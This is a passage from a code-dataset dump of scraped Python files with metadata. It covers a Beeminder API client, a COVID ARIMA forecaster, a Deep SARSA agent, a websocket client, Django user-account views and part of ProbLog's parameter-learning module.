{1}\\n{2} points are within {3:.3%} euclidian range of this point based on original domain.\\nNumber of function evaluations: {4}'\n num_arr = np.array2string((x[index, :]), precision=4, separator='\\t', sign=' ')[1:-1]\n results_msg = results_msg.format(f[index], num_arr, len(neigh_idx), r, fun_evals)\n if self.terminal:\n print(Fore.RESET + results_msg)\n return results_msg","sub_path":"pycfiles/surropt-0.0.10-py3-none-any/output.cpython-36.py","file_name":"output.cpython-36.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"186779544","text":"import urllib\nimport urllib.request as urllib2\nimport settings\nimport json\nimport sys\n\n\n# based on https://www.beeminder.com/api\nclass Beeminder:\n def __init__(self, this_auth_token):\n self._auth_token=this_auth_token\n self.base_url='https://www.beeminder.com/api/v1'\n\n def get_user(self,username):\n url = \"%s/users/%s.json\" % (self.base_url,username)\n values = {'auth_token':self._auth_token}\n result = self.call_api(url,values,'GET')\n return result\n\n def get_goal(self,username,goalname):\n url = \"%s/users/%s/goals/%s.json\" % (self.base_url,username,goalname)\n values = {'auth_token':self._auth_token}\n result = self.call_api(url,values,'GET')\n return result\n\n def get_datapoints(self,username,goalname):\n url = self.base_url+'users/'+username+'/goals/'+goalname+'/datapoints.json'\n url = \"%s/users/%s/goals/%s/datapoints.json\" % (self.base_url,username,goalname)\n values = {'auth_token':self._auth_token}\n result = self.call_api(url,values,'GET')\n return result\n\n def create_datapoint(self,username,goalname,timestamp,value,comment=' ',sendmail='false'):\n url = self.base_url+'users/'+username+'/goals/'+goalname+'/datapoints.json'\n url = \"%s/users/%s/goals/%s/datapoints.json\" % (self.base_url,username,goalname)\n values = {'auth_token':self._auth_token, 'timestamp':timestamp, 'value':value, 'comment':comment, 'sendmail':sendmail}\n result = self.call_api(url,values,'POST')\n return result\n\n def call_api(self,url,values,method='GET'):\n result=''\n data = urllib.parse.urlencode(values)\n if method=='POST':\n req = urllib2.Request(url,data.encode())\n response = urllib2.urlopen(req)\n else:\n response = urllib2.urlopen(url+'?'+data)\n result=response.read()\n return result\n\n\nclass User(Beeminder):\n def __init__(self, username=settings.BEEMINDER_USERNAME,\n this_auth_token=settings.BEEMINDER_AUTH_TOKEN):\n self.user = username\n Beeminder.__init__(self, this_auth_token)\n ud = Beeminder.get_user(self, username)\n ud = json.loads(ud)\n self._goals = ud['goals']\n\n def add_datapoint(self, goal, data, timestamp=None, comment='', sendmail='false'):\n if goal not in self._goals:\n print(\"Goal not found in available goals.\")\n return -1\n else:\n res = Beeminder.create_datapoint(self, username=self.username, )\n return res","sub_path":"beeminderpy.py","file_name":"beeminderpy.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"183152617","text":"\"\"\"\r\n\r\nA simple Stress test on Covid Dataset using ARIMA \r\nAuthor : Babak.EA \r\nDate : 2020-03-20, Persian New year \r\nTarget : ARIMA stress test on infected population per Country \r\n\r\n\"\"\"\r\n\r\n###############################\r\n\r\nfrom IPython.display import display\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib\r\nimport pandas as pd\r\nfrom pandas.io.json import json_normalize \r\nimport numpy as np\r\nimport statsmodels\r\nimport datetime\r\nimport urllib, json\r\nfrom statsmodels.tsa.arima_model import ARIMA\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom pmdarima.arima import auto_arima\r\nimport sys\r\nimport warnings\r\nimport ipywidgets as widgets\r\nfrom IPython.display import display\r\n\r\n\r\nif not sys.warnoptions:\r\n warnings.simplefilter(\"ignore\")\r\n\r\n\r\n#################################\r\n####### Database : Json #########\r\nURL=\"https://pomber.github.io/covid19/timeseries.json\"\r\n\r\n#################################\r\n\r\nclass Covid:\r\n def __init__(self,URL):\r\n self.URL=URL\r\n\r\n self.Load_Json()\r\n self.Json_to_Pandas()\r\n self.Json_to_Pandas_kids()\r\n\r\n def Load_Json(self):# input Json URL, Output: Json Data\r\n json_url =urllib.request.urlopen(self.URL)\r\n self.data = json.loads(json_url.read())\r\n self.Country_list=list(self.data.keys())\r\n \r\n def Json_to_Pandas(self): # Json to Pandas DataFrame\r\n DF=json_normalize(self.data[self.Country_list[0]])\r\n DF.set_index([\"date\"], inplace = True, \r\n append = False, drop = True)\r\n \r\n Col=[self.Country_list[0],self.Country_list[0]+\"_D\",self.Country_list[0]+\"_R\"]\r\n DF.columns=Col\r\n DF.index=pd.to_datetime(DF.index)\r\n self.DF=DF\r\n\r\n \r\n def Json_to_Pandas_kids(self):\r\n for i in self.Country_list[1:]:\r\n df_tem=json_normalize(self.data[i])\r\n df_tem.set_index([\"date\"], inplace = True, \r\n append = False, drop = True)\r\n Col=[i,i+\"_D\",i+\"_R\"]\r\n df_tem.columns=Col\r\n self.DF = pd.concat([self.DF, df_tem], axis=1)\r\n\r\n\r\n\r\nclass Country_select(Covid):\r\n \r\n def __init__(self):\r\n Covid.__init__(self,URL)\r\n self.ALL='ALL'\r\n \r\n self.dropdown_class =widgets.Dropdown(options =\r\n sorted(['ALL','EXIT']+ self.Country_list), description= \"Select Country: \" )\r\n self.flag=\"All\"\r\n\r\n self.output = widgets.Output()\r\n \r\n self.dropdown_class.observe(self.dropdown_class_eventhandler, names='value')\r\n \r\n display(self.dropdown_class)\r\n display(self.output)\r\n\r\n \"\"\"\r\n def unique_sorted_values_plus_ALL(self,array):\r\n self.array=array\r\n \r\n unique = self.array.unique().tolist()\r\n unique.sort()\r\n unique.insert(0, self.ALL)\r\n self.unique=unique\r\n \"\"\"\r\n\r\n def dropdown_class_eventhandler(self,name):\r\n #print(name)\r\n \r\n #print(self.dropdown_class.value)\r\n self.change=self.dropdown_class.value\r\n\r\n self.output.clear_output()\r\n #Col=\r\n with self.output:\r\n\r\n if (self.change== self.ALL):\r\n display(self.DF)\r\n \r\n elif(self.change==\"EXIT\" ):\r\n print(\"Thnak you for using my Library\")\r\n \r\n \r\n else:\r\n Col=[x for x in self.DF.columns.tolist() if self.change in x]\r\n self.df=self.DF[Col]\r\n Country_select.ARIMA_Death_Ratio(self.DF[Col])\r\n \r\n #display(df)\r\n def ARIMA_Death_Ratio(df):\r\n\r\n col=df.columns.tolist()\r\n train=df[0:-5] \r\n test=df[-6:] \r\n model=auto_arima(train[col[0]], start_p=1, start_q=1,\r\n max_p=30, max_q=30, m=10,\r\n start_P=0, seasonal=True,\r\n d=1, D=1, trace=True,\r\n error_action='ignore', \r\n suppress_warnings=True, \r\n stepwise=True)\r\n print(model.aic())\r\n\r\n model.fit(train[col[0]])\r\n\r\n forcast = model.predict(n_periods=len(test[col[0]]))\r\n forcast = pd.DataFrame(forcast,index = test.index,columns=['Prediction'])\r\n\r\n train[\"Class\"]=\"Training\"\r\n test[\"Class\"]=\"Valid Data\"\r\n forcast[col[1]]=0\r\n forcast[col[2]]=0\r\n forcast[\"Class\"]=\"Forcast\"\r\n forcast.columns=train.columns.tolist() \r\n DF_SNS=pd.concat([train,test,forcast])\r\n DF_SNS['Day']=DF_SNS.index\r\n DF_SNS[col[0]] = DF_SNS[col[0]].astype(np.float64)\r\n\r\n ax = sns.lineplot(x=\"Day\", y=col[0],\r\n hue=\"Class\", style=\"Class\",\r\n markers=True, dashes=False, data=DF_SNS)\r\n\r\n ax.set_xticklabels(DF_SNS['Day'],rotation=45)\r\n ax.set(xlabel=col[0]+\"__Daily Report\", ylabel= \"Number of Infected in \"+col[0])\r\n\r\n \r\n\r\n plt.show()\r\n \r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"data/Covid_19_Babak_old_v1.py","file_name":"Covid_19_Babak_old_v1.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"277265280","text":"import copy\nimport pylab\nimport random\nimport numpy as np\nfrom environment import Env\nfrom keras.layers import Dense\nfrom keras.optimizers import Adam\nfrom keras.models import Sequential\n\nEPISODES = 2500\n\nclass DeepSARSAAgent:\n def __init__(self):\n self.load_model = False\n\n # 가능한 모든 행동\n self.action_space = [0, 1, 2, 3, 4]\n\n # 상태의 크기와 행동의 크기\n self.action_size = len(self.action_space)\n self.state_size = 15\n self.discount_factor =0.99\n self.learning_rate = 0.001\n\n self.epsilon = 1\n self.epsilon_decay = .9999\n self.epsilon_min = 0.01\n\n # build_model은 처음 agent를 호출할 때 한 번 실행\n self.model = self.build_model()\n\n if self.load_model:\n self.model.load_weights('./save_model/deep_sarsa_trained.h5') # 이거는 뭘까\n\n # 상태가 입력, 큐함수가 출력인 인공신경망\n def build_model(self):\n model = Sequential()\n\n model.add(Dense(30, input_dim=self.state_size, activation='relu'))\n model.add(Dense(30, activation='relu'))\n\n # 출력으로 나오는 게 큐함수인데 큐함수는 0과 1 사이의 값이 아니기 때문에 출력층의 활성함수는 선형함수\n model.add(Dense(self.state_size, activation='linear'))\n\n model.summary()\n model.compile(loss='mse', optimizer=Adam(lr=self.learning_rate))\n return model\n\n def get_action(self, state):\n if np.random.rand() <= self.epsilon:\n return random.randrange(self.action_size)\n else:\n state = np.float32(state)\n\n # state를 모델에 집어넣어서 출력을 반환\n q_values = self.model.predict(state)\n\n # 출력이 [[],[],[],[],[]]형식이기 때문에 [0]을 붙여서 한꺼풀 벗김, 5개(행동의 개수)의 큐함수\n return np.argmax(q_values[0])\n\n def train_model(self, state, action, reward, next_state, next_action, done):\n\n # 딥살사는 입실론을 계속 감소 시킴 : 초반에는 탐험을 자주 하고, 후에는 탐험을 줄임 -> 예측대로 움직임\n if self.epsilon > self.epsilon_min:\n self.epsilon *= self.epsilon_decay\n\n # 케라스에 들어가는 입력은 float 이어야 함\n state = np.float32(state)\n next_state = np.float32(next_state)\n target = self.model.predict(state)[0]\n\n if done:\n target[action] = reward\n else: # 살사의 큐함수 업데이트 식에서 정답(타깃) : R + r*Q(s',a')\n target[action] = (reward + self.discount_factor *\n self.model.predict(next_state)[0][next_action])\n # 실제로 수행한 행동에 해당하는 큐함수에 대해서만 오류함수를 계산해야함^^^^^^^^^^^^, 다른 4개의 큐함수는 오차가 0\n\n # 계산한 타깃과 상태 입력으로 인공신경망을 업데이트\n # 출력값 reshape : model.predict(state)의 출력 형태로 변형\n target = np.reshape(target, [1, 5])\n\n # 인공신경망 업데이트\n self.model.fit(state, target, epochs=1, verbose=0)\n\n\nif __name__ == \"__main__\":\n env = Env()\n agent = DeepSARSAAgent()\n\n global_step = 0\n scores, episodes = [], []\n\n for e in range(EPISODES):\n done = False\n score = 0\n state = env.reset()\n state = np.reshape(state, [1, 15])\n\n while not done:\n global_step += 1\n\n # 1. 현재 상태에 대한 행동 선택\n action = agent.get_action(state)\n\n # 2. 행동을 취한 후 환경에서 한 타임스텝 진행, 3. 환경으로부터 다음 상태와 보상을 받음\n next_state, reward, done = env.step(action)\n\n # reshape는 데이터는 그대로 두고 차원만을 바꿔주는 함수\n next_state = np.reshape(next_state, [1, 15])\n\n # 4. 다음 상태에 대한 행동을 선택\n next_action = agent.get_action(next_state)\n\n # 5. 환경으로부터 받은 정보를 토대로 학습을 진행\n # 기존의 큐함수 테이블 대신 인공신경망을 사용함, 입력 : 상태의 특징들, 출력 : 각 행동에 대한 큐함수(근사된 거)\n agent.train_model(state, action, reward, next_state, next_action, done)\n\n state = next_state\n score += reward\n state = copy.deepcopy(next_state)\n\n if done:\n # 에피소드마다 학습 결과 출력\n scores.append(score)\n episodes.append(e)\n pylab.plot(episodes, scores, 'b')\n pylab.savefig(\"./save_graph/deep-sarsa.png\")\n print(\"episode:\", e, \"score:\", score, \"global_step\", global_step, \"epsilon:\", agent.epsilon)\n\n # 100 에피소드마다 모델 저장\n if e % 100 == 0:\n agent.model.save_weights(\"./save_model/deep_sarsa.h5\")","sub_path":"GridWorld/DeepSarsa/deep_sarsa_agent.py","file_name":"deep_sarsa_agent.py","file_ext":"py","file_size_in_byte":5034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"394499936","text":"import aiohttp\nimport asyncio\nimport aioredis\nfrom aioconsole import ainput\n\nfrom settings import config\n\n\nasync def foo():\n await ainput(\"Text here:\")\n\n\nasync def ws_client():\n session = aiohttp.ClientSession()\n\n async with session.ws_connect('http://0.0.0.0:8080/ws') as ws:\n await login(ws)\n await prompt(ws)\n async for msg in ws:\n print('Receive from server:', msg.data)\n await prompt(ws)\n\n\nasync def prompt(ws):\n # msg = input('type message: ')\n await ws.send_str(await ainput(\"message: \"))\n\n\nasync def login(ws):\n await ws.send_str(await ainput(\"Username: \"))\n await ws.send_str(await ainput(\"Password: \"))\n\nasyncio.get_event_loop().run_until_complete(ws_client())\n","sub_path":"app_gif/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"473080209","text":"# _*_ coding:utf-8 _*_\n'''\n@author: caimmy@qq.com\n@license: FREE\n@contact: http://www.github.com/caimmy\n@software: in ksg\n@file: predfines\n@time: 17-4-13 下午3:48\n@desc:\n\n'''\n\nTAG_ENABLE = '1' # 启用标签\nTAG_DISABLE = '0' # 禁用标签","sub_path":"core/predfines.py","file_name":"predfines.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"169404498","text":"from django.shortcuts import render, redirect, reverse, HttpResponse\nfrom .forms import UserRegisterForm, UserLoginForm, UserForgetForm, UserResetForm, UserChangeInfoForm, \\\n UserChangeImageform, UserSendCodeForm, UserChangeEmailForm\nfrom .models import UserProfile, EmailVerify\nfrom django.db.models import Q\nfrom django.contrib.auth import authenticate, login, logout\nfrom helptools.send_mail_tool import send_email_verify\nfrom django.http import JsonResponse\nfrom datetime import datetime\nfrom operations.models import UserCourseInfo, UserLoveInfo, UserMessageInfo\nfrom orgs.models import OrgInfo, TeacherInfo\nfrom courses.models import CourseInfo\nfrom .models import Banner\nfrom django.views import View\n\n\nclass IndexView(View):\n def get(self, request):\n all_banners = Banner.objects.all().order_by('-add_time')[:5]\n all_bannercourses = CourseInfo.objects.filter(is_banner=True).order_by('-click_num')[:3]\n all_courses = CourseInfo.objects.filter(is_banner=False).order_by('-add_time')[:6]\n all_orgs = OrgInfo.objects.all().order_by('-click_num')[:15]\n return render(request, 'index.html', {\n 'all_banners': all_banners,\n 'all_bannercourses': all_bannercourses,\n 'all_courses': all_courses,\n 'all_orgs': all_orgs\n })\n\n\nclass UserRegisterView(View):\n def get(self, request):\n user_register_form = UserRegisterForm()\n return render(request, 'users/register.html', {\n 'user_register_form': user_register_form\n })\n\n def post(self, request):\n user_register_form = UserRegisterForm(request.POST)\n if user_register_form.is_valid():\n email = user_register_form.cleaned_data['email']\n password = user_register_form.cleaned_data['password']\n user = UserProfile.objects.filter(Q(email=email) | Q(username=email))\n if user:\n return render(request, 'users/register.html', {\n 'msg': '用户已经存在'\n })\n else:\n a = UserProfile()\n a.username = email\n a.email = email\n a.set_password(password)\n a.save()\n\n # 注册成功之后先创建一条消息存储,然后发邮件\n msg = UserMessageInfo()\n msg.userinfo = a.id\n msg.message = '欢迎注册尚在线'\n msg.save()\n\n send_email_verify(email, 'register')\n\n return HttpResponse('您的邮件已经发送,请尽快去激活')\n else:\n return render(request, 'users/register.html', {\n 'user_register_form': user_register_form\n })\n\n\ndef user_login(request):\n if request.method == 'GET':\n return render(request, 'users/login.html', {\n })\n else:\n user_login_form = UserLoginForm(request.POST)\n if user_login_form.is_valid():\n email = user_login_form.cleaned_data['email']\n password = user_login_form.cleaned_data['password']\n a = authenticate(username=email, password=password)\n if a:\n if a.is_start:\n login(request, a)\n msg = UserMessageInfo()\n msg.userinfo = a.id\n msg.message = '欢迎登录尚在线'\n msg.save()\n # return redirect(reverse('index'))\n url = request.COOKIES.get('url', '/')\n ret = redirect(url)\n ret.delete_cookie('url')\n return ret\n else:\n return HttpResponse('请去激活')\n else:\n return render(request, 'users/login.html', {\n 'msg': '用户名或者密码有误'\n })\n else:\n return render(request, 'users/login.html', {\n 'user_login_form': user_login_form\n })\n\n\ndef user_active(request, code):\n if code:\n email_ver = EmailVerify.objects.filter(code=code)[0]\n email = email_ver.email\n user = UserProfile.objects.filter(email=email)[0]\n user.is_start = True\n user.save()\n return redirect(reverse('users:user_login'))\n else:\n pass\n\n\ndef user_logout(request):\n logout(request)\n return redirect(reverse('index'))\n\n\ndef user_forget(request):\n if request.method == 'GET':\n user_forget_form = UserForgetForm()\n return render(request, 'users/user_forget.html', {\n 'user_forget_form': user_forget_form\n })\n else:\n user_forget_form = UserForgetForm(request.POST)\n if user_forget_form.is_valid():\n email = user_forget_form.cleaned_data['email']\n user = UserProfile.objects.filter(email=email)\n if user:\n send_email_verify(email, 'forget')\n return HttpResponse('请速去激活重置密码')\n else:\n return HttpResponse('您输入的邮箱不存在')\n else:\n return render(request, 'users/user_forget.html', {\n 'user_forget_form': user_forget_form\n })\n\n\ndef user_reset(request, code):\n if request.method == 'GET':\n if code:\n email_ver = EmailVerify.objects.filter(code=code)[0]\n email = email_ver.email\n user = UserProfile.objects.filter(email=email)[0]\n return render(request, 'users/user_reset.html', {\n 'user_id': user.id\n })\n else:\n pass\n else:\n user_reset_form = UserResetForm(request.POST)\n if user_reset_form.is_valid():\n password = user_reset_form.cleaned_data['password']\n password1 = user_reset_form.cleaned_data['password1']\n if code:\n user = UserProfile.objects.filter(id=int(code))\n if user:\n if password == password1:\n user[0].set_password(password)\n user[0].save()\n return redirect(reverse('users:user_login'))\n else:\n return render(request, 'users/user_reset.html', {\n 'msg': '两次密码不一致'\n })\n else:\n pass\n else:\n pass\n else:\n return render(request, 'users/user_reset.html', {\n 'user_reset_form': user_reset_form\n })\n\n\ndef user_info(request):\n return render(request, 'users/usercenter-info.html')\n\n\ndef user_changeimage(request):\n user_changeimage_form = UserChangeImageform(request.POST, request.FILES, instance=request.user)\n if user_changeimage_form.is_valid():\n user_changeimage_form.save(commit=True)\n return JsonResponse({'status': 'ok'})\n else:\n return JsonResponse({'status': 'fail'})\n\n\ndef user_changeinfo(request):\n user_change_info_form = UserChangeInfoForm(request.POST, instance=request.user)\n if user_change_info_form.is_valid():\n user_change_info_form.save(commit=True)\n return JsonResponse({'status': 'ok'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '修改失败'})\n\n\ndef user_sendcode(request):\n user_sendcode_form = UserSendCodeForm(request.POST)\n if user_sendcode_form.is_valid():\n email = user_sendcode_form.cleaned_data['email']\n useremail = UserProfile.objects.filter(Q(email=email) | Q(username=email))\n if useremail:\n return JsonResponse({'status': 'fail', 'msg': '邮箱已经被绑定'})\n else:\n email_ver = EmailVerify.objects.filter(email=email, send_type='changeemail').order_by('-add_time')\n if email_ver:\n if (datetime.now() - email_ver[0].add_time).seconds < 120:\n return JsonResponse({'status': 'ok', 'msg': '验证码已经发送过。。。'})\n\n send_email_verify(email, 'changeemail')\n return JsonResponse({'status': 'ok', 'msg': '修改邮箱验证码已经发送'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '邮箱不合法'})\n\n\ndef user_changeemail(request):\n user_changeemail_form = UserChangeEmailForm(request.POST)\n if user_changeemail_form.is_valid():\n email = user_changeemail_form.cleaned_data['email']\n code = user_changeemail_form.cleaned_data['code']\n email_code = EmailVerify.objects.filter(email=email, code=code)\n if email_code:\n request.user.username = email\n request.user.email = email\n request.user.save()\n return JsonResponse({'status': 'ok', 'msg': '修改成功'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '修改失败'})\n else:\n return JsonResponse({'status': 'fail', 'msg': '修改失败'})\n\n\ndef user_course(request):\n usercourse_list = UserCourseInfo.objects.filter(userinfo=request.user)\n all_courses = [usercourse.courseinfo for usercourse in usercourse_list]\n\n return render(request, 'users/usercenter-mycourse.html', {\n 'all_courses': all_courses\n })\n\n\ndef user_loveorg(request):\n userorg_list = UserLoveInfo.objects.filter(userinfo=request.user, love_type=1, love_status=True)\n all_orgids = [userorg.love_id for userorg in userorg_list]\n all_orgs = OrgInfo.objects.filter(id__in=all_orgids)\n return render(request, 'users/usercenter-fav-org.html', {\n 'all_orgs': all_orgs\n })\n\n\ndef user_loveteacher(request):\n userteacher_list = UserLoveInfo.objects.filter(userinfo=request.user, love_type=3, love_status=True)\n all_teacherids = [userteacher.love_id for userteacher in userteacher_list]\n all_teachers = TeacherInfo.objects.filter(id__in=all_teacherids)\n return render(request, 'users/usercenter-fav-teacher.html', {\n 'all_teachers': all_teachers\n })\n\n\ndef user_lovecourse(request):\n usercourse_list = UserLoveInfo.objects.filter(userinfo=request.user, love_type=2, love_status=True)\n all_courseids = [usercourse.love_id for usercourse in usercourse_list]\n all_courses = CourseInfo.objects.filter(id__in=all_courseids)\n return render(request, 'users/usercenter-fav-course.html', {\n 'all_courses': all_courses\n })\n\n\ndef user_message(request):\n all_messages = UserMessageInfo.objects.filter(userinfo=request.user.id)\n return render(request, 'users/usercenter-message.html', {\n 'all_messages': all_messages\n })\n\n\ndef user_readmessage(request):\n msgid = request.GET.get('msgid', '')\n if msgid:\n msg = UserMessageInfo.objects.filter(id=int(msgid))[0]\n msg.msg_status = True\n msg.save()\n return JsonResponse({'status': 'ok'})\n else:\n return JsonResponse({'status': 'fail'})\n\n\ndef handler_404(request):\n ret = render(request, '404.html')\n ret.status_code = 404\n return ret\n\n\ndef handler_500(request):\n ret = render(request, '500.html')\n ret.status_code = 500\n return ret\n","sub_path":"ShangOnline/apps/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"218648901","text":"#! /usr/bin/env python\n\n\"\"\"\nLearning from interpretations\n-----------------------------\nParameter learning for ProbLog.\nGiven a probabilistic program with parameterized weights and a set of partial implementations,\nlearns appropriate values of the parameters.\nContinuous distributions\n++++++++++++++++++++++++\nA parametrized weight can also be a continuous normal distribution if the atom it is associated\nwith only appears as a head (thus is not used in any bodies of other ProbLog rules).\nFor example, the following GMM:\n.. code-block:: prolog::\n t(0.5)::c.\n t(normal(1,10))::fa :- c.\n t(normal(10,10))::fa :- \\+c.\nwith evidence:\n.. code-block:: prolog::\n evidence(fa, 10).\n ---\n evidence(fa, 18).\n ---\n evidence(fa, 8).\nOr a multivariate GMM:\n.. code-block:: prolog\n t(0.5)::c.\n t(normal([1,1],[10,1,1,10]))::fa :- c.\n t(normal([10,10],[10,1,1,10]))::fa :- \\+c.\nwith evidence:\n.. code-block:: prolog\n evidence(fa, [10,11]).\n ---\n evidence(fa, [18,12]).\n ---\n evidence(fa, [8,7]).\nThe covariance matrix is represented as a row-based list ([[10,1],[1,10]] is [10,1,1,10]).\nThe GMM can also be represent compactly and as one examples:\n.. code-block:: prolog\n t(0.5)::c(ID,1); t(0.5)::c(ID,2).\n comp(1). comp(2).\n t(normal(_,_),C)::fa(ID) :- comp(C), c(ID,C).\nwith evidence:\n.. code-block:: prolog::\n evidence(fa(1), 10).\n evidence(fa(2), 18).\n evidence(fa(3), 8).\nAlgorithm\n+++++++++\nThe algorithm operates as follows:\n 0. Set initial values for the weights to learn.\n 1. Set the evidence present in the example.\n 2. Query the model for the weights of the atoms to be learned.\n 3. Update the weights to learn by taking the mean value over all examples and queries.\n 4. Repeat steps 1 to 4 until convergence (or a maximum number of iterations).\nThe score of the model for a given example is obtained by calculating the probability of the\nevidence in the example.\nImplementation\n++++++++++++++\nThe algorithm is implemented on top of the ProbLog toolbox.\nIt uses the following extensions of ProbLog's classes:\n * a LogicProgram implementation that rewrites the model and extracts the weights to learn\n (see :py:func:`learning.lfi.LFIProblem.__iter__`)\n * a custom semiring that looks up the current value of a weight to learn\n (see :py:func:`learning.lfi.LFIProblem.value`)\n.. autoclass:: learning.lfi.LFIProblem\n :members: __iter__, value\n\"\"\"\n\nfrom __future__ import print_function\n\nimport sys\nimport random\nimport math\nimport logging\n\ntry:\n from typing import List, Union\nexcept ImportError:\n List, Union = None, None\n\nfrom collections import defaultdict\nfrom itertools import chain\nfrom problog.util import init_logger\nfrom logging import getLogger\nfrom problog.engine import DefaultEngine, ground\nfrom problog.evaluator import (\n SemiringProbability,\n SemiringLogProbability,\n SemiringDensity,\n DensityValue,\n)\nfrom problog.logic import (\n Term,\n Constant,\n Clause,\n AnnotatedDisjunction,\n Or,\n Var,\n InstantiationError,\n ArithmeticError,\n term2list,\n list2term,\n Not,\n)\nfrom problog.program import PrologString, PrologFile, LogicProgram\nfrom problog.core import ProbLogError\nfrom problog.errors import process_error, InconsistentEvidenceError\n\n# Scipy and Numpy are optional installs (only required for continuous variables)\ntry:\n import scipy.stats as stats\nexcept ImportError:\n stats = None\ntry:\n import numpy as np\nexcept ImportError:\n np = None\n\nfrom problog import get_evaluatable, get_evaluatables\nimport traceback\n\n\ndef str2bool(s):\n if str(s) == \"true\":\n return True\n elif str(s) == \"false\":\n return False\n else:\n return None\n\n\ndef str2num(s):\n \"\"\"Translate a Term that represents a number or list of numbers to observations (as Python primitives).\n :return: Tuple of (isobserved?, values)\n \"\"\"\n if s.is_constant() and (s.is_float() or s.is_integer()):\n return True, s.compute_value()\n elif s.functor == \".\":\n values = term2list(s)\n numvalues = []\n for value in values:\n if isinstance(value, int) or isinstance(value, float):\n numvalues.append(value)\n else:\n return None, None\n return True, tuple(numvalues)\n else:\n return None, None\n\n\ncdist_names = [\"normal\"]\n\n\ndef dist_prob(d, x, eps=None, log=False, density=True):\n \"\"\"Compute the density of the value x given the distribution d (use interval 2*eps around x).\n Returns a polynomial\n :param d: Distribution Term\n :param x: Value\n :param log: use log-scale computations\n :return: Probability\n \"\"\"\n\n if stats is None or np is None:\n raise ProbLogError(\n \"Continuous variables require Scipy and Numpy to be installed.\"\n )\n\n if d.functor == \"normal\":\n if isinstance(d.args[0], Term) and d.args[0].functor == \".\":\n args = (term2list(d.args[0]), term2list(d.args[1]))\n else:\n args = d.args\n if isinstance(args[0], list): # multivariate\n m = args[0]\n ndim = len(m)\n cov = args[1]\n if len(cov) != ndim * ndim:\n raise ValueError(\"Distribution parameters do not match: {}\".format(d))\n cov = np.reshape(cov, (ndim, ndim))\n try:\n rv = stats.multivariate_normal(m, cov)\n except np.linalg.linalg.LinAlgError as exc:\n logger = getLogger(\"problog_lfi\")\n logger.debug(\n \"Encountered a singular covariance matrix: N({},\\n{})\".format(\n m, cov\n )\n )\n raise exc\n if log:\n raise NotImplementedError(\"log computations not yet supported\")\n else:\n result = [0, rv.pdf(x)]\n retval = DensityValue(result)\n else: # univariate\n m, s = map(float, d.args)\n rv = stats.norm(m, s)\n # TODO: The multiplication with eps should be avoided by working with densities\n result = rv.pdf(x)\n if log:\n try:\n result = math.log(result)\n except ValueError:\n result = -math.inf\n # # print('dist_prob({}, {}) -> {}'.format(d, x, result))\n retval = DensityValue([0, result])\n\n if density:\n return retval\n else:\n return float(retval)\n raise ValueError(\"Distribution not supported '%s'\" % d.functor)\n\n\ndef dist_prob_set(d, values, eps=1e-4):\n \"\"\"Fit parameters based on EM.\n :param d: Distribution Term\n :param values: List of (value, weight, count)\n \"\"\"\n logger = getLogger(\"problog_lfi\")\n if stats is None or np is None:\n raise ProbLogError(\n \"Continuous variables require Scipy and Numpy to be installed.\"\n )\n if d.functor == \"normal\":\n if isinstance(d.args[0], Term) and d.args[0].functor == \".\":\n args = (term2list(d.args[0]), term2list(d.args[1]))\n else:\n args = d.args\n if isinstance(args[0], list): # multivariate\n # TODO: cleanup (make nice with numpy, store numpy in Term to avoid conversions?)\n pf = 0.0\n ndim = len(args[0])\n mu = np.zeros(ndim)\n cov = np.zeros((ndim, ndim))\n for value, weight, count in values:\n weight = float(weight)\n pf += weight * count\n mu += weight * count * np.array(value)\n if pf == 0.0:\n # Reuse previous distribution, no samples found\n return d\n mu /= pf\n for value, weight, count in values:\n weight = float(weight)\n xmu = np.matrix(value) - mu\n cov += weight * count * xmu.T * xmu\n cov /= pf\n s_eps = eps ** 2\n # if np.linalg.matrix_rank(cov) != ndim:\n # # The matrix is singular, reinitialise to random value\n # # See Bishop 9.2.1 on singularities in GMM. Better solutions exist.\n # logger.debug('Singular matrix, reset to random values')\n # mu = np.random.random(ndim)\n # cov = np.diagflat([1000.0]*ndim)\n # for i in range(cov.shape[0]):\n # if cov[i, i] < s_eps:\n # # Covariance is corrected to not have probabilities larger than 1\n # # Pdf is multiplied with eps to translate to prob\n # logger.debug('Corrected covar from {} to {}'.format(cov[i, i], s_eps))\n # cov[i, i] = s_eps\n try:\n rv = stats.multivariate_normal(mu, cov)\n if rv.pdf(mu) > 1.0 / (2 * eps):\n logger.debug(\"PDF larger than 1.0/(2*eps), assume singularity\")\n raise np.linalg.linalg.LinAlgError()\n except np.linalg.linalg.LinAlgError:\n logger.debug(\"Singular matrix for normal dist, reset to random values\")\n logger.debug(\"mu = {}\".format(mu))\n logger.debug(\"cov = \\n{}\".format(cov))\n # The matrix is singular, reinitialise to random value\n # See Bishop 9.2.1 on singularities in GMM. Better solutions exist.\n mu = np.random.random(ndim)\n cov = np.diagflat([1000.0] * ndim)\n cov = cov.reshape(-1)\n # # print('Update: {} -> normal({},{})'.format(d, mu, cov))\n # values.sort(key=lambda t: t[0])\n # for value, weight, count in values:\n # # print('({:<4}, {:7.5f}, {:<4})'.format(value, weight, count))\n return d.with_args(list2term(mu.tolist()), list2term(cov.tolist()))\n else: # univariate\n pf = 0.0\n mu = 0.0\n var = 0.0\n for value, weight, count in values:\n weight = float(weight)\n pf += weight * count\n mu += weight * count * value\n if pf == 0.0:\n # Reuse previous distribution, no samples found\n return 